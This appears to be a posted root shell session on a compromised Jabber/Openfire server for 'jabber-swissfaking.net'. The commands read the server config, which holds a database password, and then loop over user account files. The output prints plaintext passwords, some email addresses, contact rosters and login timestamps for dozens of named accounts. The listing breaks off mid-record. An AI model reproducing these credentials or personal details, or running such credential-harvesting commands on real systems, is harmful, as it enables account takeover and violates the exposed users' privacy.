07:04 0:00 -bash + +# cd /usr/share/openfire && ls -la +total 20 +drwxr-x--- 5 openfire openfire 4096 Jan 3 00:49 . +drwxr-xr-x 114 root root 4096 Aug 9 02:02 .. +lrwxrwxrwx 1 openfire openfire 13 Aug 9 02:02 conf -> /etc/openfire +lrwxrwxrwx 1 openfire openfire 29 Aug 9 02:02 embedded-db -> /var/lib/openfire/embedded-db +drwxr-x--- 2 openfire openfire 4096 Aug 9 02:02 lib +lrwxrwxrwx 1 openfire openfire 17 Aug 9 02:02 logs -> /var/log/openfire +drwxr-xr-x 3 openfire openfire 4096 Jan 3 00:49 monitoring +lrwxrwxrwx 1 openfire openfire 25 Aug 9 02:02 plugins -> /var/lib/openfire/plugins +drwxr-x--- 3 openfire openfire 4096 Aug 9 02:02 resources + +# cd conf && ls -la +total 32 +drwxr-x--- 3 openfire openfire 4096 Jan 6 16:40 . +drwxr-xr-x 84 root root 4096 Jan 3 01:45 .. +-rw-r--r-- 1 openfire openfire 9403 Jan 6 16:40 available-plugins.xml +-rw-r--r-- 1 openfire openfire 1876 Jan 3 00:51 openfire.xml +drwxr-x--- 2 openfire openfire 4096 Jan 3 01:31 security +-rw-r--r-- 1 openfire openfire 11 Jan 6 16:40 server-update.xml + +# cat openfire.xml + + + + + + + + 9618 + 9619 + + de + + + + org.jivesoftware.database.DefaultConnectionProvider + + + + org.postgresql.Driver + jdbc:postgresql://localhost:5432/openfire + openfire + pass123 + select 1 + true + true + 5 + 25 + 1.0 + + + true + + + false + + + + +# cd /var/lib/jabber && ls -la +total 12 +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 . +drwxr-xr-x 27 root root 4096 Aug 9 02:02 .. +drwx------ 2 root root 4096 Aug 9 01:34 jabber-swissfaking.net + +# cd jabber-swissfaking.net && ls -la +total 192 +drwx------ 2 root root 4096 Aug 9 01:34 . +drwxr-xr-x 3 jabber adm 4096 Jul 30 21:44 .. +-rw------- 1 root root 1332 Aug 4 16:46 afroman.xml +-rw------- 1 root root 1387 Aug 8 15:38 babypanda.xml +-rw------- 1 root root 411 Aug 4 00:03 basics.xml +-rw------- 1 root root 976 Aug 3 15:31 batonde.xml +-rw------- 1 root root 9717 Aug 8 21:56 bullddoser.xml +-rw------- 1 root root 845 Aug 3 17:44 cr4ck.xml +-rw------- 1 root root 9791 Aug 8 15:16 crankz.xml +-rw------- 1 root root 391 Aug 3 15:43 cryten.xml +-rw------- 1 root root 906 Aug 7 19:39 darkfunny.xml +-rw------- 1 root root 596 Aug 8 17:47 dotsyn.xml +-rw------- 1 root root 564 Aug 4 16:47 el!t3.xml +-rw------- 1 root root 2177 Aug 8 23:08 fickmaus.xml +-rw------- 1 root root 391 Aug 4 23:26 flash.xml +-rw------- 1 root root 1428 Aug 5 16:17 freakout.xml +-rw------- 1 root root 1201 Aug 8 23:20 glycerin\40jabber-swissfaking.net.xml +-rw------- 1 root root 787 Aug 4 14:37 hackthenet.xml +-rw------- 1 root root 1300 Aug 5 16:17 hans-wurst.xml +-rw------- 1 root root 390 Aug 5 00:59 holzmen.xml +-rw------- 1 root root 636 Aug 7 23:25 jamyla\40jabber-swissfaking.net.xml +-rw------- 1 root root 393 Jul 30 22:10 kappy777.xml +-rw------- 1 root root 392 Aug 5 15:38 kluless.xml +-rw------- 1 root root 424 Aug 9 00:55 luigi100.xml +-rw------- 1 root root 794 Aug 8 15:39 naik.xml +-rw------- 1 root root 390 Aug 8 16:36 nitex.xml +-rw------- 1 root root 699 Aug 8 22:16 racketeer.xml +-rw------- 1 root root 992 Aug 5 16:17 s0xtech.xml +-rw------- 1 root root 392 Aug 3 23:16 sinned.xml +-rw------- 1 root root 20723 Aug 5 16:27 st3ffl0r.xml +-rw------- 1 root root 2325 Aug 8 03:49 syntax\40jabber-swissfaking.net.xml +-rw------- 1 root root 645 Aug 9 01:12 syntex.xml +-rw------- 1 root root 724 Aug 8 15:39 theird21.xml +-rw------- 1 root root 1754 Aug 8 15:38 the|biggie.xml +-rw------- 1 root root 1764 Aug 9 01:34 trickz.xml +-rw------- 1 root root 409 Aug 3 20:22 w!cked.xml +-rw------- 1 root root 396 Aug 8 03:12 w00dka.xml +-rw------- 1 root root 1324 Aug 5 05:06 weareone.xml +-rw------- 1 root root 547 Aug 8 18:22 yaboybigt.xml + +# for file in *; do echo $file; cat $file; echo -e "\n"; done +afroman.xml +JGMlms91afromanregisteredFriendsFriendsFriendsFriends + +babypanda.xml +BTYM8hbabypandaBabyPandaregisteredDisconnectedFriendsFriendsFriendsFriends + +basics.xml +nicki123!basicsregisteredDisconnected + +batonde.xml +1asdfghjklbatonderegistered\roster:delimiterReplaced by new connectionbatonde<ROLE/><URL/><DESC/></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +bullddoser.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>xdfhrrt568KZKF6)</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>bullddoser</username><name>BullDDOSer</name><email>Bullddoser@pakistans.com</email><x xmlns='jabber:x:delay' stamp='20100730T20:37:19'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><N><FAMILY/> +<GIVEN/> +<MIDDLE/> +</N> +<ORG><ORGNAME/> +<ORGUNIT/> +</ORG> +<FN/> +<URL/> +<TITLE/> +<NICKNAME/> +<PHOTO><TYPE>image/jpeg</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAIAAADYYG7QAAAXYUlEQVR42i2XCZRbV5nny6WtpNIuPent70lv35+kKqtUkkpVJan2fXNVucpLed+w4yW2E8dxbLezeI/t2ImBxIRAAuSQEE7oJk2zJXRgzoQtaZrDGeYMA909mSYN4dDQsc3MJ5NzPum85d77fvf7/t93720aGRmpVMq9veVqtVitFnqrpZ7eUrXWVauXq7VSL1xXS319pXq9WKuWa9WuWq1Yr3cODBYHBorwvL+/Alavl8H6+7qGBopjY/nR0a5aX3d3rdQYE0boLff2NKxa7YRmcAvjwCvo3tfX6NvXVxgcLPf3d01PDzdVKpVisdDebufzVkeHlc9n8qszhUKu0JntKGTgtlCwi8XGf0dHBqxQsIpFu1y2S6...AAAElFTkSuQmCC</BINVAL></PHOTO> +<EMAIL><HOME/><INTERNET/><PREF/><USERID/> +</EMAIL> +<TEL><PAGER/><WORK/><NUMBER/> +</TEL> +<TEL><CELL/><WORK/><NUMBER/> +</TEL> +<TEL><VOICE/><WORK/><NUMBER/> +</TEL> +<TEL><FAX/><WORK/><NUMBER/> +</TEL> +<TEL><PAGER/><HOME/><NUMBER/> +</TEL> +<TEL><CELL/><HOME/><NUMBER/> +</TEL> +<TEL><VOICE/><HOME/><NUMBER/> +</TEL> +<TEL><FAX/><HOME/><NUMBER/> +</TEL> +<ADR><WORK/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +<ADR><HOME/><PCODE/> +<REGION/> +<STREET/> +<CTRY/> +<LOCALITY/> +</ADR> +</vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281222880' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +cr4ck.xml +<xdb><query xmlns='jabber:iq:last' last='1280843048' xdbns='jabber:iq:last'>Registered</query><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>hahaha</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cr4ck</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:44:08'>registered</x></query><foo xdbns='jabber:x:offline' xmlns='jabber:x:offline'><message from='jabber-swissfaking.net' to='cr4ck@jabber-swissfaking.net'> + <subject>Welcome!</subject> + <body>Welcome to the Jabber server -- we hope you enjoy this service! For information about how to use Jabber, visit the Jabber User's Guide at http://jabbermanual.jabberstudio.org/</body> + <x xmlns='jabber:x:delay' from='cr4ck@jabber-swissfaking.net' stamp='20100803T13:44:08'>Offline Storage</x></message></foo></xdb> + +crankz.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>muttertier11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>crankz</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:23:54'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAIAAAABc2X6AAAAA3NCSVQICAjb4U/gAAAXyklEQVR42sV8XY/jRpblIXlFHanoLNou72T3VA9ysL0LA9sP/dALLPZp//q+zeM...uQmCC</BINVAL></PHOTO></vCard><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Jabber - Swissfaking</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='freakout@jabber-swissfaking.net' name='Freakout' subscription='both'><group>Jabber - Swissfaking</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='Syntax' subscription='from' ask='subscribe'><group>Jabber - Swissfaking</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281266160' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +cryten.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>54342101</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>cryten</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T11:41:15'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280835782' xdbns='jabber:iq:last'/></xdb> + +darkfunny.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Master1993</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>darkfunny</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T15:07:57'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280934820' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='to' subscribe=''><group>Friends</group></item></query></xdb> + +dotsyn.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>ownage</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>dotsyn</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:47:52'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281275221' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +el!t3.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>huren1</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>el!t3</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:39:06'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280843826' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +fickmaus.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>t9N#1~R\dKd6</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>fickmaus</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T18:12:17'>registered</x></query><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><query xmlns='jabber:iq:last' last='1281226381' xdbns='jabber:iq:last'>Disconnected</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='bullddoser@jabber-swissfaking.net' name='bullddoser' subscription='both'><group>swiss</group></item><item jid='crankz@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='freakout@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='hackthenet@jabber-swissfaking.net' name='hackthenet' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' subscription='from'><group>swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='weareone@jabber-swissfaking.net' name='weareone' subscription='both'><group>Friends</group><group>swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/><item jid='racketeer@jabber-swissfaking.net' subscription='from'/><item jid='darkfunny@jabber-swissfaking.net' subscription='from'/><item jid='conference.localhost' subscription='from' ask='subscribe'/><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='glycerin@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query></xdb> + +flash.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>12SchneSi</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>flash</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T19:24:16'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280949991' xdbns='jabber:iq:last'/></xdb> + +freakout.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>Ghana11</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>freakout</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T10:13:13'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280922217' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='Fickmaus' subscription='to'><group>Friends</group></item><item jid='trickz@jabber-swissfaking.net' name='Trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='Afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Friends</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='both'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='both'><group>Friends</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +glycerin\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kevin123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>glycerin\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100808T11:37:30'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='none' ask='subscribe'><group>Friends</group></item><item jid='racketeer@jabber-swissfaking.net' name='Racketeer' subscription='both'><group>Friends</group></item><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281295248' xdbns='jabber:iq:last'/></xdb> + +hackthenet.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>sonne123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hackthenet</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T21:49:48'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='both'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='both'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='babypanda' subscription='both'><group>Friends</group></item></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280918275' xdbns='jabber:iq:last'/></xdb> + +hans-wurst.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>volkan</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>hans-wurst</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T09:45:39'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280956100' xdbns='jabber:iq:last'>Disconnected</query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='crankz' subscription='both'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='both'><group>Swiss</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query></xdb> + +holzmen.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>jabing</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>holzmen</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:52:11'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280955549' xdbns='jabber:iq:last'/></xdb> + +jamyla\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>2wsx6zhn</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>jamyla\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:58:39'>registered</x></query><scratchpad xmlns='scratchpad:tasks' j_private_flag='1' xdbns='scratchpad:tasks'><tasks showAll='true'/></scratchpad><foo xdbns='jabber:xdb:nslist' xmlns='jabber:xdb:nslist'><ns type='private'>scratchpad:tasks</ns></foo><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281209105' xdbns='jabber:iq:last'/></xdb> + +kappy777.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>kappy777</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kappy777</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100730T17:44:43'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280513424' xdbns='jabber:iq:last'/></xdb> + +kluless.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>wtf!1337</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>kluless</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100805T11:37:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281008315' xdbns='jabber:iq:last'/></xdb> + +luigi100.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>frauke</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>luigi100</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T03:25:49'>registered</x></query><query xmlns='jabber:iq:last' last='1281300897' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +naik.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>c15g4</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>naik</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:15:20'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281007640' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='annie90@jabber.ccc.de' name='' subscription='both'><group>Jabber</group></item><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='from' ask='subscribe'><group>Buddies</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='none' subscribe='' hidden=''/></query></xdb> + +nitex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>19083862</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>nitex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100802T20:37:54'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281271005' xdbns='jabber:iq:last'/></xdb> + +racketeer.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>neumsche</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>racketeer</username><name/><email/><x xmlns='jabber:x:delay' stamp='20100803T13:32:38'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='' subscription='to'><group>swiss</group></item><item jid='glycerin\40jabber-swissfaking.net@jabber-swissfaking.net' name='' subscription='both'><group>swiss</group></item></query><query xmlns='jabber:iq:last' last='1281291383' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +s0xtech.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>s0xy00</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>s0xtech</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T07:19:17'>registered</x></query><query xmlns='jabber:iq:last' last='1280825558' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Friends</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='to'><group>Friends</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Friends</group></item><item jid='hans-wurst@jabber-swissfaking.net' subscription='from'/><item jid='freakout@jabber-swissfaking.net' subscription='from'/><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' subscription='from'/></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +sinned.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>vollidiot</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>sinned</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T19:03:31'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280862994' xdbns='jabber:iq:last'/></xdb> + +st3ffl0r.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>HanZ123</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>st3ffl0r</username><name>Ich</name><email>iamweasel@marsmail.de</email><x xmlns='jabber:x:delay' stamp='20100805T11:28:40'>registered</x></query><vCard xmlns='vcard-temp' xdbns='vcard-temp'><PHOTO><TYPE>image/png</TYPE><BINVAL>iVBORw0KGgoAAAANSUhEUgAAAF8AAABgCAIAAAD0AjnaAAAAA3NCSVQICAjb4U/gAAAgAElEQVR42oy8WZM...Mv9pCZHqyIEyWcPpVmUv22TEF3l1Kny8Js4m7WTLwiBvyVZn+a5hF/ENYv/jETXn6+WbfO0vYK7nQ1q+MOm5Hc8Nuu23wn2TSuNvKNqKcLc8efYMALyFjEOFaAQHV45gl85/x2yGLznPZ6jM75ju8LsTILanf/GAL4Ybff0qZ9Y8DcN5tCO3/QgU3B1qvXv3n9cgfNLl5Yvlb3PGXttQkAzPbZSNvvmq5yDV8b+PHjYIo8n1+vLpv2es77Hg1wvny59K8JuP+T9PTAv9D/H9sBRgei4KAAAAAElFTkSuQmCC</BINVAL></PHOTO></vCard><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1281011278' xdbns='jabber:iq:last'>Disconnected</query></xdb> + +syntax\40jabber-swissfaking.net.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>seckin!kilic!91</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntax\40jabber-swissfaking.net</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:44:55'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'><message id='IoS3Q-21' to='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' from='naik@jabber-swissfaking.net/spark'><x xmlns='jabber:x:event'/><x xmlns='jabber:x:delay' from='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' stamp='20100805T11:07:06'>Offline Storage</x></message></foo><query xmlns='jabber:iq:last' last='1280928948' xdbns='jabber:iq:last'/><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='fickmaus@jabber-swissfaking.net' name='fickmaus' subscription='to'><group>Swiss</group></item><item jid='trickz@jabber-swissfaking.net' name='trickz' subscription='to'><group>Swiss</group></item><item jid='afroman@jabber-swissfaking.net' name='afroman' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='babypanda@jabber-swissfaking.net' name='BabyPanda' subscription='to'><group>Swiss</group></item><item jid='s0xtech@jabber-swissfaking.net' name='s0xtech' subscription='to'><group>Swiss</group></item><item jid='the|biggie@jabber-swissfaking.net' name='the|biggie' subscription='both'><group>Swiss</group></item><item jid='crankz@jabber-swissfaking.net' name='Crankz' subscription='to' subscribe=''><group>Swiss</group></item><item jid='hans-wurst@jabber-swissfaking.net' name='hans-wurst' subscription='to'><group>Swiss</group></item><item jid='freakout@jabber-swissfaking.net' name='FreakOut' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='naik@jabber-swissfaking.net' name='naik' subscription='to' subscribe=''><group>Swiss</group></item><item jid='el!t3@jabber-swissfaking.net' name='eL!t3' subscription='none' ask='subscribe'><group>Swiss</group></item><item jid='yaboybigt@jabber-swissfaking.net' name='yaboybigT' subscription='to'><group>Swiss</group></item><item jid='theird21@jabber-swissfaking.net' name='theird21' subscription='both'><group>Swiss</group></item><item jid='syntex@jabber-swissfaking.net' name='syntex' subscription='both'><group>Swiss</group></item></query></xdb> + +syntex.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>swissjabber</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>syntex</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100804T12:33:58'>registered</x></query><query xmlns='jabber:iq:roster' xdbns='jabber:iq:roster'><item jid='syntax\40jabber-swissfaking.net@jabber-swissfaking.net' name='syntax@jabber-swissfaking.net' subscription='both'><group>Friends</group></item></query><query xmlns='jabber:iq:last' last='1281301960' xdbns='jabber:iq:last'>Replaced by new connection</query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/></xdb> + +theird21.xml +<xdb><password xmlns='jabber:iq:auth' xdbns='jabber:iq:auth'>00025879</password><query xmlns='jabber:iq:register' xdbns='jabber:iq:register'><username>theird21</username><email/><name/><x xmlns='jabber:x:delay' stamp='20100803T13:05:17'>registered</x></query><foo xmlns='jabber:x:offline' xdbns='jabber:x:offline'/><query xmlns='jabber:iq:last' last='1280927487' xdbns='jabber:iq:last'/><query 